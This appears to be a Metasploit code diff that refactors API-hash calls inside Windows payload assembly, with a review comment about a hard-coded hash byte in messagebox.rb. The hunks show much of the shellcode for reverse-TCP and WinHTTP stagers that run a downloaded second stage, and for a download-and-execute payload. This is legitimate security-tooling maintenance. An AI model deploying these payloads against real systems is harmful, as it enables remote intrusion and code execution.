@@ def asm_block_recv_rc4(opts={}) mov r8, rsi ; length mov rdx, rbx ; the current address into our second stages RWX buffer mov rcx, rdi ; the saved socket - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + mov r10d, #{block_api_hash('ws2_32.dll', 'recv')} call rbp ; recv( s, buffer, length, 0 ); add rsp, 32 ; restore stack after api_call ^ @@ -137,14 +137,14 @@ def asm_block_recv_rc4(opts={}) pop r8 ; dwFreeType push 0 ; 0 pop rdx ; dwSize - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')} + mov r10d, #{block_api_hash('kernel32.dll', 'VirtualFree')} call rbp ; VirtualFree(payload, 0, MEM_COMMIT) cleanup_socket: ; clean up the socket push rdi ; socket handle pop rcx ; s (closesocket parameter) - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')} + mov r10d, #{block_api_hash('ws2_32.dll', 'closesocket')} call rbp ; and try again 
diff --git a/lib/msf/core/payload/windows/x64/reverse_tcp_x64.rb b/lib/msf/core/payload/windows/x64/reverse_tcp_x64.rb index b51cd95a29d5c..a397906a79b20 100644 --- a/lib/msf/core/payload/windows/x64/reverse_tcp_x64.rb +++ b/lib/msf/core/payload/windows/x64/reverse_tcp_x64.rb @@ -120,14 +120,14 @@ def asm_reverse_tcp(opts={}) ; perform the call to LoadLibraryA... mov rcx, r14 ; set the param for the library to load - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call rbp ; LoadLibraryA( "ws2_32" ) ; perform the call to WSAStartup... mov rdx, r13 ; second param is a pointer to this struct push 0x0101 ; pop rcx ; set the param for the version requested - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')} + mov r10d, #{block_api_hash('ws2_32.dll', 'WSAStartup')} call rbp ; WSAStartup( 0x0101, &WSAData ); ; stick the retry count on the stack and store it @@ -144,7 +144,7 @@ def asm_reverse_tcp(opts={}) mov rdx, rax ; push SOCK_STREAM inc rax ; mov rcx, rax ; push AF_INET - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')} + mov r10d, #{block_api_hash('ws2_32.dll', 'WSASocketA')} call rbp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 ); mov rdi, rax ; save the socket for later @@ -154,7 +154,7 @@ def asm_reverse_tcp(opts={}) pop r8 ; pop off the third param mov rdx, r12 ; set second param to pointer to sockaddr struct mov rcx, rdi ; the socket - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')} + mov r10d, #{block_api_hash('ws2_32.dll', 'connect')} call rbp ; connect( s, &sockaddr, 16 ); test eax, eax ; non-zero means failure @@ -173,7 +173,7 @@ def asm_reverse_tcp(opts={}) else asm << %Q^ failure: - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + mov r10d, #{block_api_hash('kernel32.dll', 'ExitProcess')} call rbp ^ end 
@@ -203,7 +203,7 @@ def asm_block_recv(opts={}) push 4 ; pop r8 ; length = sizeof( DWORD ); mov rcx, rdi ; the saved socket - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + mov r10d, #{block_api_hash('ws2_32.dll', 'recv')} call rbp ; recv( s, &dwLength, 4, 0 ); ^ @@ -228,7 +228,7 @@ def asm_block_recv(opts={}) pop r8 ; MEM_COMMIT mov rdx, rsi ; the newly received second stage length. xor rcx, rcx ; NULL as we dont care where the allocation is. - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call rbp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); ; Receive the second stage and execute it... mov rbx, rax ; rbx = our new memory address for the new stage @@ -239,7 +239,7 @@ def asm_block_recv(opts={}) mov r8, rsi ; length mov rdx, rbx ; the current address into our second stages RWX buffer mov rcx, rdi ; the saved socket - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + mov r10d, #{block_api_hash('ws2_32.dll', 'recv')} call rbp ; recv( s, buffer, length, 0 ); ^ @@ -258,14 +258,14 @@ def asm_block_recv(opts={}) pop r8 ; dwFreeType push 0 ; 0 pop rdx ; dwSize - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')} + mov r10d, #{block_api_hash('kernel32.dll', 'VirtualFree')} call rbp ; VirtualFree(payload, 0, MEM_COMMIT) cleanup_socket: ; clean up the socket push rdi ; socket handle pop rcx ; s (closesocket parameter) - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')} + mov r10d, #{block_api_hash('ws2_32.dll', 'closesocket')} call rbp ; and try again diff --git a/lib/msf/core/payload/windows/x64/reverse_win_http_x64.rb b/lib/msf/core/payload/windows/x64/reverse_win_http_x64.rb index 2e862c9e03a66..ea333c13bc230 100644 --- a/lib/msf/core/payload/windows/x64/reverse_win_http_x64.rb +++ b/lib/msf/core/payload/windows/x64/reverse_win_http_x64.rb 
@@ -205,7 +205,7 @@ def asm_reverse_winhttp(opts={}) mov r14, 'winhttp' push r14 ; Push 'winhttp',0 onto the stack mov rcx, rsp ; lpFileName (stackpointer) - mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} ; LoadLibraryA + mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')} ; LoadLibraryA call rbp ^ @@ -216,7 +216,7 @@ def asm_reverse_winhttp(opts={}) mov r14, 'crypt32' push r14 ; Push 'crypt32',0 onto the stack mov rcx, rsp ; lpFileName (stackpointer) - mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} ; LoadLibraryA + mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')} ; LoadLibraryA call rbp ^ end @@ -249,7 +249,7 @@ def asm_reverse_winhttp(opts={}) xor r9, r9 ; pwszProxyBypass (NULL) push rbx ; stack alignment push rbx ; dwFlags (0) - mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpen')}; WinHttpOpen + mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpOpen')}; WinHttpOpen call rbp ^ @@ -267,7 +267,7 @@ def asm_reverse_winhttp(opts={}) mov rcx, rax ; hSession mov r8, #{opts[:port]} ; nServerPort xor r9, r9 ; dwReserved - mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpConnect')} ; WinHttpConnect + mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpConnect')} ; WinHttpConnect call rbp call winhttpopenrequest @@ -305,7 +305,7 @@ def asm_reverse_winhttp(opts={}) push rax push rbx ; lppwszAcceptType (NULL) push rbx ; pwszReferer (NULL) - mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpenRequest')} ; WinHttpOpenRequest + mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpOpenRequest')} ; WinHttpOpenRequest call rbp prepare: 
@@ -322,7 +322,7 @@ def asm_reverse_winhttp(opts={}) mov rdx, 0x1002 ; (0x1002=WINHTTP_OPTION_PROXY_USERNAME) push #{proxy_user.length} ; dwBufferLength (proxy_user length) pop r9 - mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption + mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption call rbp ^ end @@ -337,7 +337,7 @@ def asm_reverse_winhttp(opts={}) mov rdx, 0x1003 ; (0x1003=WINHTTP_OPTION_PROXY_PASSWORD) push #{proxy_pass.length} ; dwBufferLength (proxy_pass length) pop r9 - mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption + mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption call rbp ^ end @@ -349,7 +349,7 @@ def asm_reverse_winhttp(opts={}) sub rax, 32 mov rdi, rsp ; save a pointer to this buffer mov rcx, rdi ; this buffer is also the parameter to the function - mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpGetIEProxyConfigForCurrentUser')} ; WinHttpGetIEProxyConfigForCurrentUser + mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpGetIEProxyConfigForCurrentUser')} ; WinHttpGetIEProxyConfigForCurrentUser call rbp test eax, eax ; skip the rest of the proxy stuff if the call failed @@ -385,7 +385,7 @@ def asm_reverse_winhttp(opts={}) mov rdx, r13 ; lpcwszUrl ; finally make the call - mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpGetProxyForUrl')} ; WinHttpGetProxyForUrl + mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpGetProxyForUrl')} ; WinHttpGetProxyForUrl call rbp test eax, eax ; skip the rest of the proxy stuff if the call failed @@ -412,7 +412,7 @@ def asm_reverse_winhttp(opts={}) mov rcx, rsi ; hConnection (connection handle) push 38 pop rdx ; (38=WINHTTP_OPTION_PROXY) - mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption + mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption call rbp ie_proxy_setup_finish: 
@@ -439,7 +439,7 @@ def asm_reverse_winhttp(opts={}) mov r8, rsp ; lpBuffer (pointer to flags) push 4 pop r9 ; dwBufferLength (4 = size of flags) - mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption + mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption call rbp xor r8, r8 ; dwHeadersLen (0) @@ -469,7 +469,7 @@ def asm_reverse_winhttp(opts={}) push rbx ; dwContext (0) push rbx ; dwTotalLength (0) push rbx ; dwOptionalLength (0) - mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSendRequest')} ; WinHttpSendRequest + mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpSendRequest')} ; WinHttpSendRequest call rbp test eax, eax jnz handle_response @@ -497,7 +497,7 @@ def asm_reverse_winhttp(opts={}) asm << %Q^ failure: ; hard-coded to ExitProcess(whatever) for size - mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + mov r10d, #{block_api_hash('kernel32.dll', 'ExitProcess')} call rbp ; ExitProcess(whatever) ^ end @@ -507,7 +507,7 @@ def asm_reverse_winhttp(opts={}) mov rcx, rsi ; hRequest push rbx pop rdx ; lpReserved (NULL) - mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')} ; WinHttpReceiveResponse + mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')} ; WinHttpReceiveResponse call rbp test eax, eax ; make sure the request succeeds jz failure @@ -527,7 +527,7 @@ def asm_reverse_winhttp(opts={}) push rbx ; 0 for alignment push 8 ; One whole pointer mov r9, rsp ; Stack pointer (lpdwBufferLength) - mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpQueryOption')} + mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpQueryOption')} call rbp test eax, eax ; use eax instead of rax, saves a byte jz failure ; Bail out if we couldn't get the certificate context 
@@ -542,7 +542,7 @@ def asm_reverse_winhttp(opts={}) mov r14, r8 ; Back the stack pointer up for later use push 3 pop rdx ; CERT_SHA1_HASH_PROP_ID (dwPropId) - mov r10, #{Rex::Text.block_api_hash('crypt32.dll', 'CertGetCertificateContextProperty')} + mov r10d, #{block_api_hash('crypt32.dll', 'CertGetCertificateContextProperty')} call rbp test eax, eax ; use eax instead of rax, saves a byte jz failure ; Bail out if we couldn't get the certificate context @@ -574,7 +574,7 @@ def asm_reverse_winhttp(opts={}) push 4 pop r8 ; dwNumberOfBytesToRead (4 bytes) mov rcx, rsi ; hFile (request handle) - mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReadData')} ; WinHttpReadData + mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpReadData')} ; WinHttpReadData call rbp test eax, eax ; did the download fail? jz failure @@ -589,7 +589,7 @@ def asm_reverse_winhttp(opts={}) push 0x40 pop r9 ; flProtect (0x40=PAGE_EXECUTE_READWRITE) mov r8, 0x1000 ; flAllocationType (0x1000=MEM_COMMIT) - mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call rbp ;download stage @@ -602,7 +602,7 @@ def asm_reverse_winhttp(opts={}) mov r8, rax ; dwNumberOfBytesToRead (incoming stage size) mov rdx, rbx ; lpBuffer (pointer to mem) mov r9, rdi ; lpdwNumberOfByteRead (stack pointer) - mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReadData')} ; WinHttpReadData + mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpReadData')} ; WinHttpReadData call rbp add rsp, 32 ; clean up reserved space test eax, eax ; did the download fail? @@ -619,7 +619,7 @@ def asm_reverse_winhttp(opts={}) mov r9, rdx ; flProtect (0x40=PAGE_EXECUTE_READWRITE) shl edx, 16 ; dwSize mov r8, 0x1000 ; flAllocationType (0x1000=MEM_COMMIT) - mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} ; VirtualAlloc + mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')} ; VirtualAlloc call rbp download_prep: 
@@ -633,7 +633,7 @@ def asm_reverse_winhttp(opts={}) mov rdx, rbx ; lpBuffer (pointer to mem) mov r8, 8192 ; dwNumberOfBytesToRead (8k) mov r9, rdi ; lpdwNumberOfByteRead (stack pointer) - mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReadData')} ; WinHttpReadData + mov r10d, #{block_api_hash('winhttp.dll', 'WinHttpReadData')} ; WinHttpReadData call rbp add rsp, 32 ; clean up reserved space diff --git a/lib/msf/core/payload/windows/x64/send_uuid_x64.rb b/lib/msf/core/payload/windows/x64/send_uuid_x64.rb index 7266757b930c6..fc60c6df95f68 100644 --- a/lib/msf/core/payload/windows/x64/send_uuid_x64.rb +++ b/lib/msf/core/payload/windows/x64/send_uuid_x64.rb @@ -30,7 +30,7 @@ def asm_send_uuid(uuid=nil) get_uuid_address: pop rdx ; UUID address mov rcx, rdi ; Socket handle - mov r10, #{Rex::Text.block_api_hash('ws2_32.dll', 'send')} + mov r10d, #{block_api_hash('ws2_32.dll', 'send')} call rbp ; call send ^ diff --git a/lib/msf/util/exe/windows/common.rb b/lib/msf/util/exe/windows/common.rb index ed0deac66638d..711ddff6597e7 100644 --- a/lib/msf/util/exe/windows/common.rb +++ b/lib/msf/util/exe/windows/common.rb @@ -578,6 +578,7 @@ def to_dotnetmem(base = 0x12340000, data = '', opts = {}) # This wrapper is responsible for allocating RWX memory, copying the # target code there, setting an exception handler that calls ExitProcess # and finally executing the code. + # TODO: We should use the standardized version of block-api here and use randomized IV def win32_rwx_exec(code) stub_block = Rex::Payloads::Shuffle.from_graphml_file( File.join(Msf::Config.install_root, 'data', 'shellcode', 'block_api.x86.graphml'), diff --git a/modules/payloads/singles/windows/dns_txt_query_exec.rb b/modules/payloads/singles/windows/dns_txt_query_exec.rb index 672c863e8814a..ee88f8cd2e153 100644 --- a/modules/payloads/singles/windows/dns_txt_query_exec.rb +++ b/modules/payloads/singles/windows/dns_txt_query_exec.rb 
@@ -96,7 +96,7 @@ def generate(_opts = {}) push eax ; flAllocationType MEM_COMMIT (0x1000) push eax ; dwSize (0x1000) push 0x0 ; lpAddress - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + push #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call ebp push eax ; save pointer on stack, will be used in memcpy mov #{bufferreg}, eax ; save pointer, to jump to at the end @@ -110,7 +110,7 @@ def generate(_opts = {}) push eax ; push 'dnsapi' to the stack push 0x61736e64 ; ... push esp ; Push a pointer to the 'dnsapi' string on the stack. - push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + push #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call ebp ; LoadLibraryA( "dnsapi" ) ;prepare for loop of queries @@ -133,7 +133,7 @@ def generate(_opts = {}) push #{queryoptions} ; Options push #{w_type} ; wType push eax ; lpstrName - push #{Rex::Text.block_api_hash('dnsapi.dll', 'DnsQuery_A')} + push #{block_api_hash('dnsapi.dll', 'DnsQuery_A')} call ebp ; test eax, eax ; query ok? jnz jump_to_payload ; no, jump to payload diff --git a/modules/payloads/singles/windows/download_exec.rb b/modules/payloads/singles/windows/download_exec.rb index cdd4d823279ce..5d4d8b471833c 100644 --- a/modules/payloads/singles/windows/download_exec.rb +++ b/modules/payloads/singles/windows/download_exec.rb @@ -50,8 +50,8 @@ def generate(_opts = {}) # ;0x00000200 ; INTERNET_FLAG_NO_UI" exitfuncs = { - 'THREAD' => Rex::Text.block_api_hash('kernel32.dll', 'ExitThread').to_i(16), # ExitThread - 'PROCESS' => Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess').to_i(16), # ExitProcess + 'THREAD' => block_api_hash('kernel32.dll', 'ExitThread').to_i(16), # ExitThread + 'PROCESS' => block_api_hash('kernel32.dll', 'ExitProcess').to_i(16), # ExitProcess 'SEH' => 0x00000000, # we don't care 'NONE' => 0x00000000 # we don't care } 
@@ -137,7 +137,7 @@ def generate(_opts = {}) push 0x696e6977 ; ... mov esi, esp ; Save a pointer to wininet push esp ; Push a pointer to the "wininet" string on the stack. - push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} ; hash( "kernel32.dll", "LoadLibraryA" ) + push #{block_api_hash('kernel32.dll', 'LoadLibraryA')} ; hash( "kernel32.dll", "LoadLibraryA" ) call ebp ; LoadLibraryA( "wininet" ) internetopen: @@ -147,7 +147,7 @@ def generate(_opts = {}) push edi ; LPCTSTR lpszProxyName push edi ; DWORD dwAccessType (PRECONFIG = 0) push esi ; LPCTSTR lpszAgent ("wininet\x00") - push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')} ; hash( "wininet.dll", "InternetOpenA" ) + push #{block_api_hash('wininet.dll', 'InternetOpenA')} ; hash( "wininet.dll", "InternetOpenA" ) call ebp jmp.i8 dbl_get_server_host @@ -163,7 +163,7 @@ def generate(_opts = {}) push #{port_nr} ; PORT push ebx ; HOSTNAME push eax ; HINTERNET hInternet - push #{Rex::Text.block_api_hash('wininet.dll', 'InternetConnectA')} ; hash( "wininet.dll", "InternetConnectA" ) + push #{block_api_hash('wininet.dll', 'InternetConnectA')} ; hash( "wininet.dll", "InternetConnectA" ) call ebp jmp.i8 get_server_uri @@ -179,7 +179,7 @@ def generate(_opts = {}) push ecx ; url push edx ; method push eax ; hConnection - push #{Rex::Text.block_api_hash('wininet.dll', 'HttpOpenRequestA')} ; hash( "wininet.dll", "HttpOpenRequestA" ) + push #{block_api_hash('wininet.dll', 'HttpOpenRequestA')} ; hash( "wininet.dll", "HttpOpenRequestA" ) call ebp mov esi, eax ; hHttpRequest @@ -195,7 +195,7 @@ def generate(_opts = {}) push eax ; &dwFlags push 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS) push esi ; hRequest - push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} ; hash( "wininet.dll", "InternetSetOptionA" ) + push #{block_api_hash('wininet.dll', 'InternetSetOptionA')} ; hash( "wininet.dll", "InternetSetOptionA" ) call ebp httpsendrequest: 
@@ -205,7 +205,7 @@ def generate(_opts = {}) push edi ; dwHeadersLength push edi ; headers push esi ; hHttpRequest - push #{Rex::Text.block_api_hash('wininet.dll', 'HttpSendRequestA')} ; hash( "wininet.dll", "HttpSendRequestA" ) + push #{block_api_hash('wininet.dll', 'HttpSendRequestA')} ; hash( "wininet.dll", "HttpSendRequestA" ) call ebp test eax,eax jnz create_file @@ -237,7 +237,7 @@ def generate(_opts = {}) push 2 ; dwShareMode push 2 ; dwDesiredAccess push edi ; lpFileName - push #{Rex::Text.block_api_hash('kernel32.dll', 'CreateFileA')} ; kernel32.dll!CreateFileA + push #{block_api_hash('kernel32.dll', 'CreateFileA')} ; kernel32.dll!CreateFileA call ebp download_prep: @@ -254,7 +254,7 @@ def generate(_opts = {}) push eax ; read length push ecx ; target buffer on stack push esi ; hRequest - push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')} ; hash( "wininet.dll", "InternetReadFile" ) + push #{block_api_hash('wininet.dll', 'InternetReadFile')} ; hash( "wininet.dll", "InternetReadFile" ) call ebp test eax,eax ; download failed? (optional?) @@ -272,20 +272,20 @@ def generate(_opts = {}) lea eax,[esp+0xc] ; get pointer to buffer push eax ; lpBuffer push ebx ; hFile - push #{Rex::Text.block_api_hash('kernel32.dll', 'WriteFile')} ; kernel32.dll!WriteFile + push #{block_api_hash('kernel32.dll', 'WriteFile')} ; kernel32.dll!WriteFile call ebp sub esp,4 ; set stack back to where it was jmp.i8 download_more close_and_run: push ebx - push #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')} ; kernel32.dll!CloseHandle + push #{block_api_hash('kernel32.dll', 'CloseHandle')} ; kernel32.dll!CloseHandle call ebp execute_file: push 0 ; don't show push edi ; lpCmdLine - push #{Rex::Text.block_api_hash('kernel32.dll', 'WinExec')} ; kernel32.dll!WinExec + push #{block_api_hash('kernel32.dll', 'WinExec')} ; kernel32.dll!WinExec call ebp thats_all_folks: 
diff --git a/modules/payloads/singles/windows/messagebox.rb b/modules/payloads/singles/windows/messagebox.rb index 072e165961419..6f614a58e857d 100644 --- a/modules/payloads/singles/windows/messagebox.rb +++ b/modules/payloads/singles/windows/messagebox.rb @@ -55,20 +55,20 @@ def generate(_opts = {}) exitfunc_asm = %( push 0 - push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + push #{block_api_hash('kernel32.dll', 'ExitProcess')} call ebp ) if datastore['EXITFUNC'].upcase.strip == 'THREAD' exitfunc_asm = %( - mov ebx, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitThread')} - push #{Rex::Text.block_api_hash('kernel32.dll', 'GetVersion')} + mov ebx, #{block_api_hash('kernel32.dll', 'ExitThread')} + push #{block_api_hash('kernel32.dll', 'GetVersion')} call ebp add esp,0x28 cmp al,0x6 jl use_exitthread ; is older than Vista or Server 2003 R2? cmp bl,0xe0 ; check if GetVersion change the hash stored in EBX jne use_exitthread - mov ebx, #{Rex::Text.block_api_hash('ntdll.dll', 'RtlExitUserThread')} + mov ebx, #{block_api_hash('ntdll.dll', 'RtlExitUserThread')} use_exitthread: push 0 push ebx @@ -85,7 +85,7 @@ def generate(_opts = {}) call get_user32 db "user32.dll", 0x00 get_user32: - push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + push #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call ebp push #{style} call get_title @@ -95,7 +95,7 @@ def generate(_opts = {}) db "#{datastore['TEXT']}", 0x00 get_text: push 0 - push #{Rex::Text.block_api_hash('user32.dll', 'MessageBoxA')} + push #{block_api_hash('user32.dll', 'MessageBoxA')} call ebp #{exitfunc_asm} ) diff --git a/modules/payloads/singles/windows/pingback_bind_tcp.rb b/modules/payloads/singles/windows/pingback_bind_tcp.rb index ca866bfeef71e..011e5fc5cd44e 100644 --- a/modules/payloads/singles/windows/pingback_bind_tcp.rb +++ b/modules/payloads/singles/windows/pingback_bind_tcp.rb 
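Review bot: In the THREAD exit stub of messagebox.rb (hunk @@ -55,20), `cmp bl,0xe0` still compares against a hard-coded low byte that the adjacent comment ties to the ExitThread hash held in ebx, but that hash is now produced by `block_api_hash` rather than the fixed `Rex::Text` value; if the mixin can return a different hash per build, the literal no longer matches and `jne use_exitthread` will always skip the RtlExitUserThread path on newer Windows. Derive the operand from the same call, e.g. `cmp bl, #{block_api_hash('kernel32.dll', 'ExitThread').to_i(16) & 0xff}`, or compare the whole register with `cmp ebx, #{block_api_hash('kernel32.dll', 'ExitThread')}`. The x64/messagebox.rb hunk at @@ -51,20 carries the identical `cmp bl,0xe0` and needs the same change. The enclosing generate method continues outside the hunk.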
@@ -63,14 +63,14 @@ def generate(_opts = {}) push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack. push 0x5F327377 ; ... push esp ; Push a pointer to the "ws2_32" string on the stack. - push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + push #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call ebp ; LoadLibraryA( "ws2_32" ) mov eax, 0x0190 ; EAX = sizeof( struct WSAData ) sub esp, eax ; alloc some space for the WSAData structure push esp ; push a pointer to this struct push eax ; push the wVersionRequested parameter - push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')} + push #{block_api_hash('ws2_32.dll', 'WSAStartup')} call ebp ; WSAStartup( 0x0190, &WSAData ); push 11 @@ -86,7 +86,7 @@ def generate(_opts = {}) ; we do not specify a protocol [5] push 1 ; push SOCK_STREAM push #{addr_fam} ; push AF_INET/6 - push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')} + push #{block_api_hash('ws2_32.dll', 'WSASocketA')} call ebp ; WSASocketA( AF_INET/6, SOCK_STREAM, 0, 0, 0, 0 ); xchg edi, eax ; save the socket for later, don't care about the value of eax after this 
@@ -97,24 +97,24 @@ def generate(_opts = {}) push #{sockaddr_size} ; length of the sockaddr_in struct (we only set the first 8 bytes, the rest aren't used) push esi ; pointer to the sockaddr_in struct push edi ; socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'bind')} + push #{block_api_hash('ws2_32.dll', 'bind')} call ebp ; bind( s, &sockaddr_in, 16 ); test eax,eax ; non-zero means a failure jnz failure ; backlog, pushed earlier [3] push edi ; socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'listen')} + push #{block_api_hash('ws2_32.dll', 'listen')} call ebp ; listen( s, 0 ); ; we set length for the sockaddr struct to zero, pushed earlier [2] ; we dont set the optional sockaddr param, pushed earlier [1] push edi ; listening socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'accept')} + push #{block_api_hash('ws2_32.dll', 'accept')} call ebp ; accept( s, 0, 0 ); push edi ; push the listening socket xchg edi, eax ; replace the listening socket with the new connected socket for further comms - push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')} + push #{block_api_hash('ws2_32.dll', 'closesocket')} call ebp ; closesocket( s ); send_pingback: @@ -124,12 +124,12 @@ def generate(_opts = {}) db #{uuid_as_db} ; PINGBACK_UUID get_pingback_address: push edi ; saved socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'send')} + push #{block_api_hash('ws2_32.dll', 'send')} call ebp ; call send push edi ; push the listening socket xchg edi, eax ; replace the listening socket with the new connected socket for further comms - push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')} + push #{block_api_hash('ws2_32.dll', 'closesocket')} call ebp ; closesocket( s ); handle_connect_failure: 
@@ -140,7 +140,7 @@ def generate(_opts = {}) cleanup_socket: ; clear up the socket push edi ; socket handle - push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')} + push #{block_api_hash('ws2_32.dll', 'closesocket')} call ebp ; closesocket(socket) failure: diff --git a/modules/payloads/singles/windows/pingback_reverse_tcp.rb b/modules/payloads/singles/windows/pingback_reverse_tcp.rb index c7edc2692c64f..7192c029fb928 100644 --- a/modules/payloads/singles/windows/pingback_reverse_tcp.rb +++ b/modules/payloads/singles/windows/pingback_reverse_tcp.rb @@ -62,7 +62,7 @@ def generate(_opts = {}) push '32' ; Push the bytes 'ws2_32',0,0 onto the stack. push 'ws2_' ; ... push esp ; Push a pointer to the "ws2_32" string on the stack. - push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + push #{block_api_hash('kernel32.dll', 'LoadLibraryA')} mov eax, ebp call eax ; LoadLibraryA( "ws2_32" ) @@ -70,7 +70,7 @@ def generate(_opts = {}) sub esp, eax ; alloc some space for the WSAData structure push esp ; push a pointer to this struct push eax ; push the wVersionRequested parameter - push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')} + push #{block_api_hash('ws2_32.dll', 'WSAStartup')} call ebp ; WSAStartup( 0x0190, &WSAData ); set_address: @@ -89,7 +89,7 @@ def generate(_opts = {}) push eax ; push SOCK_STREAM inc eax ; push eax ; push AF_INET - push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')} + push #{block_api_hash('ws2_32.dll', 'WSASocketA')} call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 ); xchg edi, eax ; save the socket for later, don't care about the value of eax after this @@ -97,7 +97,7 @@ def generate(_opts = {}) push 16 ; length of the sockaddr struct push esi ; pointer to the sockaddr struct push edi ; the socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')} + push #{block_api_hash('ws2_32.dll', 'connect')} call ebp ; connect( s, &sockaddr, 16 ); test eax,eax ; non-zero means a failure 
